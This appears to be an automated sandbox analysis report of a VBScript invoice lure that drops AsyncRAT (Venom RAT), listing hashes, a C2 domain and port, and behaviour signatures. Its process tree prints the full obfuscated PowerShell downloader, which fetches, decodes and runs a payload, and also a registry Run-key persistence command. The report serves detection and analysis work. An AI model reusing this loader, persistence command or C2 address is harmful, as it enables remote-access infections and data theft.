Analysis

  • max time kernel
    600s
  • max time network
    601s
  • platform
    windows10-1703_x64
  • resource
    win10-20231215-en
  • resource tags

    arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system
  • submitted
    22/01/2024, 20:44

General

  • Target

    INVOICE-WR002.vbs

  • Size

    15KB

  • MD5

    bb712d3c18fea72efe80f968114b4443

  • SHA1

    09eef257c8e2a61019adfc5b6f38f001e5403813

  • SHA256

    ad795f755beba3292bfc723d33bc0d276938e491629ddf50d4c3b48c55838219

  • SHA512

    3ca5ca950d6e3c63c514ee4947b561e1db8698a2f80e7f664f76741b55951a3f3edbe0a35768eb74052c6be4f3ea118931c6651577fd024f43e4089026de7c0d

  • SSDEEP

    192:lrLS5gop0kq3n98Fw9/lPlhcz+8R0YeshPQpSaUa+Ux/8eXbrl7zWI2o60KoZ3Yw:pLaO/dhIJushPYSzg1pjk2/N

Malware Config

Extracted

Family

asyncrat

Version

5.0.5

Botnet

Venom Clients

C2

vendjksld.duckdns.org:8890

Mutex

Venom_RAT_HVNC_Mutex_Venom RAT_HVNC

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Async RAT payload 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\INVOICE-WR002.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:196
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "gal;gal;gal;gal;gal;gal;gal;gal;gal;Function Fodfstets9 ($bestykkende){$Hymenial = $bestykkende.Length-1; For ($Enterorrhaphy=4; $Enterorrhaphy -lt $Hymenial){$Hovedkalender=$Hovedkalender+$bestykkende.Substring( $Enterorrhaphy, 1);$Enterorrhaphy+=5;}$Hovedkalender;}$Semestrenes=Fodfstets9 'MetrhStvetAflvtScarpBospsTend:Buff/ Gua/LbehwSkeliStilnUnlodMaluetranrTrops Komw ForoTrimnruffdBooteJallr Bams Fes.IxiacAggloKnowm Arn/PoliJAgonK Rrf/epigM Inku MajzSletzAlge.BashtChectDisef Ree ';$Hovedkalender01=Fodfstets9 'SkoviTokteHalvxTavs ';$Troedes = Fodfstets9 ' Ama\FremsBully PensSyniw TraoHeatwCamp6Forf4Solv\EgopW SouiBelln Incd Solo ForwEftesLokoP ScroStimwSirueDelmr KkkSBoush Muce UpclConfl Kne\FastvSpor1myzo.Samo0Sten\KjrspHoveoskalw TileRegurIllusSharhStine liplelmel Nst.Fucue OlvxBandeSalv ';&($Hovedkalender01) (Fodfstets9 ' Bes$StruF KrouSporl ActdBieneRekomEstiaMedenAnchd Cros FllsInsenbugoaEntokProjslsni6 Ant2Simp2 Haa=Musc$SambeVilkn AkvvBeto: PanwBrnei KaynMinidZygoi CorrSouf ') ;&($Hovedkalender01) (Fodfstets9 'Reco$GranTUndsrSwoooCoileIldsdPareeMantsbras=Rigm$HjlaFUdhnuGanglLolad KroeFastmForbaStifnRepudPrelsUsursTromnPaneaSemik FulsFled6Kans2Hvid2 Jud+Tran$ ConTInser SecoForueCosgdFrasePleosGlde ') ;&($Hovedkalender01) (Fodfstets9 ' Qui$FingLTilbemayogForne TerrStaaeRathnIntedMaseeAutosPreo Attr= Ste Ski( Tun(TrstgGuavwPetrmDishiSemi FruswPostiUnswnBigh3Vizs2Bios_Fuglp VilrTubeo CorcDisaehings AlmsRaba Unde-RevoFBarn RygrPTindr AfloUndecLufteMangsKrigs VilIToasdJubl=Sarc$Naem{shopPimmaIreinDAfry}Scho)Firm.DefiCBesvoFrihmaskemSankaGestnMargdKlvaLMiljiTeosn PapeToit)Simu Neig- KlasDemopSteelKsediTitatSoci Sove[ Slyc PaphProtaAlagrPrei] Par3durk4Kedg ');&($Hovedkalender01) (Fodfstets9 'conj$HjorFMacreOveraHvlbtSmadhFrueeEnsir ForbClineCarpdAfstd udre Kred Cle Alek=Forb Sky$MollLBalleUnwagCirceCagergldeeCompn CruddeyseDobbsDelt[Whis$FakuL Haee ExqgLocreMycor GenePaavn VeddMezceAttosRule. AigcRammoUnreu CusnSekttGloe- Pan2Inne]Lejl ');&($Hovedkalender01) (Fodfstets9 'Gung$ RomFKremrKlknaAfsktHaana StegDrejeNatur Une=Drab(AalnTmawreForrsTimotSlyn- UfePSortaFacttYppehShel Roma$VideTReserAlguoRegreCatadSammeSpecsSyne) fav Tota-TungA SurnUnaldLove Asp(Buti[MuddITvrdnAnket NonP AuttGymsrRist] Str:Nain:bogts PhyiInduzParteSkif Unsp-TakteLydiqUdeb Udh8 fir)Chir ') ;if ($Fratager) {&$Troedes $Featherbedded;} else {;$Hovedkalender00=Fodfstets9 ' CraSCanatHarda seprPanetWigg-karrBBeheiacettAnemsViseT HafrJobaachasnKorhsChinfUndeeSurarBego Oers-HymeSGenbo wamuFejlrCorncHeree Kab Fora$NydaSWalpeIndfmForeeTermsFaiptPrverPerie LevnCondeBremsKalk Delt-MuseDUnimeklensDisctSkudi SolnsyleaClartSkrmiMakkoAffrnUnbe Olie$ForsFleukuSnarlRegrdTangeVaasmHkkea QuanrverdSadtsFemhsStrunforaaFyrrkKolosTeam6Pero2Hrin2Deko ';&($Hovedkalender01) (Fodfstets9 'Skab$SmrrFSnvluUdhnlUdipdEpiceKashmSkola SplnCyrid GrasBlyas BernCapiaKompkBarnsCorn6 Sup2Bulb2 Rom=Lumi$ UnbeinfonCisavSpum:Lnpaa Dikp UnipGrnsdKornaUnintPausaJobs ') ;&($Hovedkalender01) (Fodfstets9 'CoagIRetsm Frep GruoTidsrEquitPaat-UpgaMLeggo Ford TjeuCowalUsleeSofa PhoBLauriForftSlagsUnpuTDaglranmaaSnohn StesDeclfOkkuePartrUnob ') ;$Fuldemandssnaks622=$Fuldemandssnaks622+'\Tilnavns.Cla';while (-not $Nonintuitive) {&($Hovedkalender01) (Fodfstets9 ' Alp$OverNPulloWoadn baliPresnperitDeatuCirci UndtNonciDetevnonheTant=Odon(OverTGymneFailsFlect Smr-KunsP MecaOvertunomhKonv Hem$ThesFEneruUngul retdDamreIndjm feraKunsnSweadPlaysdandsCaltnTeleaUncokBogssForv6 Str2Puga2Como)Acic ') ;&($Hovedkalender01) $Hovedkalender00;&($Hovedkalender01) (Fodfstets9 'HypeSGiantPeria SyvrButctPica-StjlSSerrl BereProfe Kalp Jul Ngle5 Bor ');}&($Hovedkalender01) (Fodfstets9 ' Hhn$UnsuFTiltoMaltdLeonfPoorsFiskt Snke Firt HoasHove Achi= Mal BesiGHedgeJordtBane-PrisCMicroConsnmasttUdloe OranKrastAkro Anag$HjemFUdstu FejlOtindDraweAalemBogiaOilbnKolbdPlatsRomasBalan DynaRdgakStedsBygg6Fibr2 Mon2Tils ');&($Hovedkalender01) (Fodfstets9 'prut$SpdbRKldee ChonGangaTopltLangiEleco LofnDiscaCounl seri attzudleiEften RikgAfhr Scim=Dere Tena[solaSAdjoyTilssEmpetTille nonmforg.EnglC Foro HaanOmbrvPlaye ForrVolatMili] Stu: Bro:ProtFStudrModeounsamHavgB udlaNonssBrneeUnde6Roug4OtorS ExctOverrCosiiChoanWelcgNonc(Prep$SkreFWacaoArbedProjffinns SaltMangekleptundesSyge)Prof ');&($Hovedkalender01) (Fodfstets9 ' Cen$LareHThinoBogkvPhoteTandd DeckLikvaOprel SideWindn CridPrvmeMapprDest2Roes Clou=cogi thei[avanSShaty Dobs TyptOvere insmSlum.CalcTPuckeStanxWerat Ren.HypeERestn Oppc EquoMisqdStaviFlitnIncagProc]Dkst: Sik:MisiA NonSSpliC TaxIFaksIslve. TanGShane TidtOffdSDamptzulurMaltipigfnhindgAstr(Peng$TrstRTarreGenknValgaUmbrtDiskiTankoTilsn DeaaLeaklDecei KadzRoseiFortnVermgHord)Nona ');&($Hovedkalender01) (Fodfstets9 ' Afm$DiebIAfkonUnapdInderPlysuEreml OnllBjereUnditLyri=Nonc$LattHReguo fravtorpeallydTyvskFustaBaptl UndePerenKerndUnsteCrourRoge2Tran. PipsUddauIndsbBernsRatatEtagrSpaliUdvanSummgsofa(Udby3 Mud0 Ove8snub4Ring9 Luf2Caff, Dan2Jobs7Gram5Damb7Hrfr2Fibb)Musi ');&($Hovedkalender01) $Indrullet;}"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2656
      • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "gal;gal;gal;gal;gal;gal;gal;gal;gal;Function Fodfstets9 ($bestykkende){$Hymenial = $bestykkende.Length-1; For ($Enterorrhaphy=4; $Enterorrhaphy -lt $Hymenial){$Hovedkalender=$Hovedkalender+$bestykkende.Substring( $Enterorrhaphy, 1);$Enterorrhaphy+=5;}$Hovedkalender;}$Semestrenes=Fodfstets9 'MetrhStvetAflvtScarpBospsTend:Buff/ Gua/LbehwSkeliStilnUnlodMaluetranrTrops Komw ForoTrimnruffdBooteJallr Bams Fes.IxiacAggloKnowm Arn/PoliJAgonK Rrf/epigM Inku MajzSletzAlge.BashtChectDisef Ree ';$Hovedkalender01=Fodfstets9 'SkoviTokteHalvxTavs ';$Troedes = Fodfstets9 ' Ama\FremsBully PensSyniw TraoHeatwCamp6Forf4Solv\EgopW SouiBelln Incd Solo ForwEftesLokoP ScroStimwSirueDelmr KkkSBoush Muce UpclConfl Kne\FastvSpor1myzo.Samo0Sten\KjrspHoveoskalw TileRegurIllusSharhStine liplelmel Nst.Fucue OlvxBandeSalv ';&($Hovedkalender01) (Fodfstets9 ' Bes$StruF KrouSporl ActdBieneRekomEstiaMedenAnchd Cros FllsInsenbugoaEntokProjslsni6 Ant2Simp2 Haa=Musc$SambeVilkn AkvvBeto: PanwBrnei KaynMinidZygoi CorrSouf ') ;&($Hovedkalender01) (Fodfstets9 'Reco$GranTUndsrSwoooCoileIldsdPareeMantsbras=Rigm$HjlaFUdhnuGanglLolad KroeFastmForbaStifnRepudPrelsUsursTromnPaneaSemik FulsFled6Kans2Hvid2 Jud+Tran$ ConTInser SecoForueCosgdFrasePleosGlde ') ;&($Hovedkalender01) (Fodfstets9 ' Qui$FingLTilbemayogForne TerrStaaeRathnIntedMaseeAutosPreo Attr= Ste Ski( Tun(TrstgGuavwPetrmDishiSemi FruswPostiUnswnBigh3Vizs2Bios_Fuglp VilrTubeo CorcDisaehings AlmsRaba Unde-RevoFBarn RygrPTindr AfloUndecLufteMangsKrigs VilIToasdJubl=Sarc$Naem{shopPimmaIreinDAfry}Scho)Firm.DefiCBesvoFrihmaskemSankaGestnMargdKlvaLMiljiTeosn PapeToit)Simu Neig- KlasDemopSteelKsediTitatSoci Sove[ Slyc PaphProtaAlagrPrei] Par3durk4Kedg ');&($Hovedkalender01) (Fodfstets9 'conj$HjorFMacreOveraHvlbtSmadhFrueeEnsir ForbClineCarpdAfstd udre Kred Cle Alek=Forb Sky$MollLBalleUnwagCirceCagergldeeCompn CruddeyseDobbsDelt[Whis$FakuL Haee ExqgLocreMycor GenePaavn VeddMezceAttosRule. AigcRammoUnreu CusnSekttGloe- Pan2Inne]Lejl ');&($Hovedkalender01) (Fodfstets9 'Gung$ RomFKremrKlknaAfsktHaana StegDrejeNatur Une=Drab(AalnTmawreForrsTimotSlyn- UfePSortaFacttYppehShel Roma$VideTReserAlguoRegreCatadSammeSpecsSyne) fav Tota-TungA SurnUnaldLove Asp(Buti[MuddITvrdnAnket NonP AuttGymsrRist] Str:Nain:bogts PhyiInduzParteSkif Unsp-TakteLydiqUdeb Udh8 fir)Chir ') ;if ($Fratager) {&$Troedes $Featherbedded;} else {;$Hovedkalender00=Fodfstets9 ' CraSCanatHarda seprPanetWigg-karrBBeheiacettAnemsViseT HafrJobaachasnKorhsChinfUndeeSurarBego Oers-HymeSGenbo wamuFejlrCorncHeree Kab Fora$NydaSWalpeIndfmForeeTermsFaiptPrverPerie LevnCondeBremsKalk Delt-MuseDUnimeklensDisctSkudi SolnsyleaClartSkrmiMakkoAffrnUnbe Olie$ForsFleukuSnarlRegrdTangeVaasmHkkea QuanrverdSadtsFemhsStrunforaaFyrrkKolosTeam6Pero2Hrin2Deko ';&($Hovedkalender01) (Fodfstets9 'Skab$SmrrFSnvluUdhnlUdipdEpiceKashmSkola SplnCyrid GrasBlyas BernCapiaKompkBarnsCorn6 Sup2Bulb2 Rom=Lumi$ UnbeinfonCisavSpum:Lnpaa Dikp UnipGrnsdKornaUnintPausaJobs ') ;&($Hovedkalender01) (Fodfstets9 'CoagIRetsm Frep GruoTidsrEquitPaat-UpgaMLeggo Ford TjeuCowalUsleeSofa PhoBLauriForftSlagsUnpuTDaglranmaaSnohn StesDeclfOkkuePartrUnob ') ;$Fuldemandssnaks622=$Fuldemandssnaks622+'\Tilnavns.Cla';while (-not $Nonintuitive) {&($Hovedkalender01) (Fodfstets9 ' Alp$OverNPulloWoadn baliPresnperitDeatuCirci UndtNonciDetevnonheTant=Odon(OverTGymneFailsFlect Smr-KunsP MecaOvertunomhKonv Hem$ThesFEneruUngul retdDamreIndjm feraKunsnSweadPlaysdandsCaltnTeleaUncokBogssForv6 Str2Puga2Como)Acic ') ;&($Hovedkalender01) $Hovedkalender00;&($Hovedkalender01) (Fodfstets9 'HypeSGiantPeria SyvrButctPica-StjlSSerrl BereProfe Kalp Jul Ngle5 Bor ');}&($Hovedkalender01) (Fodfstets9 ' Hhn$UnsuFTiltoMaltdLeonfPoorsFiskt Snke Firt HoasHove Achi= Mal BesiGHedgeJordtBane-PrisCMicroConsnmasttUdloe OranKrastAkro Anag$HjemFUdstu FejlOtindDraweAalemBogiaOilbnKolbdPlatsRomasBalan DynaRdgakStedsBygg6Fibr2 Mon2Tils ');&($Hovedkalender01) (Fodfstets9 'prut$SpdbRKldee ChonGangaTopltLangiEleco LofnDiscaCounl seri attzudleiEften RikgAfhr Scim=Dere Tena[solaSAdjoyTilssEmpetTille nonmforg.EnglC Foro HaanOmbrvPlaye ForrVolatMili] Stu: Bro:ProtFStudrModeounsamHavgB udlaNonssBrneeUnde6Roug4OtorS ExctOverrCosiiChoanWelcgNonc(Prep$SkreFWacaoArbedProjffinns SaltMangekleptundesSyge)Prof ');&($Hovedkalender01) (Fodfstets9 ' Cen$LareHThinoBogkvPhoteTandd DeckLikvaOprel SideWindn CridPrvmeMapprDest2Roes Clou=cogi thei[avanSShaty Dobs TyptOvere insmSlum.CalcTPuckeStanxWerat Ren.HypeERestn Oppc EquoMisqdStaviFlitnIncagProc]Dkst: Sik:MisiA NonSSpliC TaxIFaksIslve. TanGShane TidtOffdSDamptzulurMaltipigfnhindgAstr(Peng$TrstRTarreGenknValgaUmbrtDiskiTankoTilsn DeaaLeaklDecei KadzRoseiFortnVermgHord)Nona ');&($Hovedkalender01) (Fodfstets9 ' Afm$DiebIAfkonUnapdInderPlysuEreml OnllBjereUnditLyri=Nonc$LattHReguo fravtorpeallydTyvskFustaBaptl UndePerenKerndUnsteCrourRoge2Tran. PipsUddauIndsbBernsRatatEtagrSpaliUdvanSummgsofa(Udby3 Mud0 Ove8snub4Ring9 Luf2Caff, Dan2Jobs7Gram5Damb7Hrfr2Fibb)Musi ');&($Hovedkalender01) $Indrullet;}"
        3⤵
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1936
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
          4⤵
          • Suspicious use of NtCreateThreadExHideFromDebugger
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1652
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Guesstimating" /t REG_EXPAND_SZ /d "%Gammelkommunisten% -w 1 $Malandered=(Get-ItemProperty -Path 'HKCU:\Frea\').Teratosis;%Gammelkommunisten% ($Malandered)"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2224
            • C:\Windows\SysWOW64\reg.exe
              REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Guesstimating" /t REG_EXPAND_SZ /d "%Gammelkommunisten% -w 1 $Malandered=(Get-ItemProperty -Path 'HKCU:\Frea\').Teratosis;%Gammelkommunisten% ($Malandered)"
              6⤵
              • Adds Run key to start application
              • Modifies registry key
              PID:3092

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lpjkvgpf.nyx.ps1

          Filesize

          1B

          MD5

          c4ca4238a0b923820dcc509a6f75849b

          SHA1

          356a192b7913b04c54574d18c28d46e6395428ab

          SHA256

          6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

          SHA512

          4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

        • memory/1652-631807-0x000000007742F000-0x0000000077430000-memory.dmp

          Filesize

          4KB

        • memory/1652-631812-0x0000000073690000-0x0000000073D7E000-memory.dmp

          Filesize

          6.9MB

        • memory/1652-631810-0x00000000773D1000-0x00000000774E4000-memory.dmp

          Filesize

          1.1MB

        • memory/1652-631813-0x0000000024A50000-0x0000000024A60000-memory.dmp

          Filesize

          64KB

        • memory/1652-631808-0x0000000024A60000-0x0000000024AFC000-memory.dmp

          Filesize

          624KB

        • memory/1652-631770-0x00007FFCFB900000-0x00007FFCFBADB000-memory.dmp

          Filesize

          1.9MB

        • memory/1652-631806-0x0000000024A50000-0x0000000024A60000-memory.dmp

          Filesize

          64KB

        • memory/1652-631785-0x0000000073690000-0x0000000073D7E000-memory.dmp

          Filesize

          6.9MB

        • memory/1652-631781-0x000000006E360000-0x000000006E376000-memory.dmp

          Filesize

          88KB

        • memory/1652-631779-0x000000006E360000-0x000000006F6E3000-memory.dmp

          Filesize

          19.5MB

        • memory/1652-631772-0x00000000773D1000-0x00000000774E4000-memory.dmp

          Filesize

          1.1MB

        • memory/1652-631771-0x0000000077456000-0x0000000077457000-memory.dmp

          Filesize

          4KB

        • memory/1936-37-0x0000000007E10000-0x0000000007E76000-memory.dmp

          Filesize

          408KB

        • memory/1936-148-0x0000000009810000-0x0000000009811000-memory.dmp

          Filesize

          4KB

        • memory/1936-40-0x0000000008880000-0x00000000088CB000-memory.dmp

          Filesize

          300KB

        • memory/1936-41-0x00000000085D0000-0x0000000008646000-memory.dmp

          Filesize

          472KB

        • memory/1936-56-0x0000000009E60000-0x000000000A4D8000-memory.dmp

          Filesize

          6.5MB

        • memory/1936-57-0x00000000094B0000-0x00000000094CA000-memory.dmp

          Filesize

          104KB

        • memory/1936-62-0x00000000098C0000-0x0000000009954000-memory.dmp

          Filesize

          592KB

        • memory/1936-63-0x0000000009820000-0x0000000009842000-memory.dmp

          Filesize

          136KB

        • memory/1936-64-0x000000000A4E0000-0x000000000A9DE000-memory.dmp

          Filesize

          5.0MB

        • memory/1936-107-0x00000000099E0000-0x0000000009A00000-memory.dmp

          Filesize

          128KB

        • memory/1936-116-0x0000000004B80000-0x0000000004B90000-memory.dmp

          Filesize

          64KB

        • memory/1936-137-0x0000000009BD0000-0x0000000009BE2000-memory.dmp

          Filesize

          72KB

        • memory/1936-32-0x0000000073690000-0x0000000073D7E000-memory.dmp

          Filesize

          6.9MB

        • memory/1936-33-0x0000000004B80000-0x0000000004B90000-memory.dmp

          Filesize

          64KB

        • memory/1936-631801-0x0000000073690000-0x0000000073D7E000-memory.dmp

          Filesize

          6.9MB

        • memory/1936-145-0x0000000073690000-0x0000000073D7E000-memory.dmp

          Filesize

          6.9MB

        • memory/1936-147-0x0000000004B80000-0x0000000004B90000-memory.dmp

          Filesize

          64KB

        • memory/1936-39-0x0000000008250000-0x000000000826C000-memory.dmp

          Filesize

          112KB

        • memory/1936-149-0x000000000AA20000-0x000000000F5CD000-memory.dmp

          Filesize

          75.7MB

        • memory/1936-301-0x0000000004B80000-0x0000000004B90000-memory.dmp

          Filesize

          64KB

        • memory/1936-354-0x00007FFCFB900000-0x00007FFCFBADB000-memory.dmp

          Filesize

          1.9MB

        • memory/1936-628889-0x00000000773D1000-0x00000000774E4000-memory.dmp

          Filesize

          1.1MB

        • memory/1936-38-0x0000000007ED0000-0x0000000008220000-memory.dmp

          Filesize

          3.3MB

        • memory/1936-31-0x0000000004B90000-0x0000000004BC6000-memory.dmp

          Filesize

          216KB

        • memory/1936-36-0x0000000007CA0000-0x0000000007D06000-memory.dmp

          Filesize

          408KB

        • memory/1936-35-0x0000000007C00000-0x0000000007C22000-memory.dmp

          Filesize

          136KB

        • memory/1936-34-0x00000000075D0000-0x0000000007BF8000-memory.dmp

          Filesize

          6.2MB

        • memory/2656-4-0x00007FFCDED40000-0x00007FFCDF72C000-memory.dmp

          Filesize

          9.9MB

        • memory/2656-144-0x0000020E37390000-0x0000020E373A0000-memory.dmp

          Filesize

          64KB

        • memory/2656-631805-0x00007FFCDED40000-0x00007FFCDF72C000-memory.dmp

          Filesize

          9.9MB

        • memory/2656-143-0x0000020E37390000-0x0000020E373A0000-memory.dmp

          Filesize

          64KB

        • memory/2656-142-0x00007FFCDED40000-0x00007FFCDF72C000-memory.dmp

          Filesize

          9.9MB

        • memory/2656-26-0x0000020E37390000-0x0000020E373A0000-memory.dmp

          Filesize

          64KB

        • memory/2656-9-0x0000020E37690000-0x0000020E37706000-memory.dmp

          Filesize

          472KB

        • memory/2656-6-0x0000020E37330000-0x0000020E37352000-memory.dmp

          Filesize

          136KB

        • memory/2656-5-0x0000020E37390000-0x0000020E373A0000-memory.dmp

          Filesize

          64KB